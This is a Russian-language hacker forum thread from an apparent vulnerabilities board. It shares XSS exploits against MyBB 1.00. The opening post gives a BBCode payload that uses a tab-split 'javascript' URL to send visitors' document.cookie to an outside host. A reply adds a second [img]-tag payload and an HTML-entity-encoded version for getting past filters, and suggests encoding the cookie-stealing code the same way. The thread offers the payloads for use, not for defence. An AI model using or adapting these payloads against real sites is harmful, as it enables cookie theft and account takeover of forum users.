Форумы XSS в MyBB (MyBulletinBoard 1.00)

Discussion in 'Уязвимости CMS/форумов' started by Algol, 14 Jan 2005.

  1. Algol

    Algol New Member

    Joined:
    29 May 2002
    Messages:
    1,759
    Likes Received:
    4
    Reputations:
    0
    Эксплоит
    HTML:
    [url=" style=`background:url(javaS	cript:i=new Image()\;i.src="http://antichat.ru/cgi-bin/s.jpg"+document.cookie)`]ssssssss[/url]
    javascript через табуляцию

    Проверялось в форуме
    http://mybboard.com/community/
     
    #1 Algol, 14 Jan 2005
    Last edited: 14 Jan 2005
  2. néM3S!s

    néM3S!s Banned

    Joined:
    7 Sep 2005
    Messages:
    31
    Likes Received:
    10
    Reputations:
    12
    Excellent ! :)

    ThX Algol
     
  3. Romaxa55

    Romaxa55 Banned

    Joined:
    19 Oct 2005
    Messages:
    144
    Likes Received:
    30
    Reputations:
    4
    Спасибо, но мне кажется я гдето это видел... а не на секьюри?
     
  4. Ricky

    Ricky Banned

    Joined:
    4 Jan 2006
    Messages:
    7
    Likes Received:
    2
    Reputations:
    0
    А зачем тебе обратный слеш \; ?

    Кстати если написать вот так,

    HTML:
    [img]http://www.wj"'='.gif[/img]'style=background:url('javascript:alert(/wj/)');
    То будет работать во всех трех браузерах, Опера, Фаерфокс и ИЕ. Но так как Фаерфокс имеет автоматическую защиту, то алерт выскочит только в ИЕ и Опере.

    Строку,

    Нужно закодировать Юникодом UTF-8 используя эту ссылку.

    http://ha.ckers.org/xss.html

    Там где говориться
    Так как произойдет фильтрация.

    Будет это все выглядеть типа вот так,

    HTML:
    [img]http://www.wj"'='.gif[/img]'style=&#98&#97&#99&#107&#103&#114&#111&#117&#110&#100&#58&#117&#114&#108&#40&#39&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#47&#119&#106&#47&#41&#39&#41&#59
    Только после каждого символа, теперь надо поставить точку с запятой. (;)

    Код для воровки кук, можно взять от Алгола и так же его закодировать. :rolleyes:
     
    #4 Ricky, 6 Jan 2006
    Last edited: 6 Jan 2006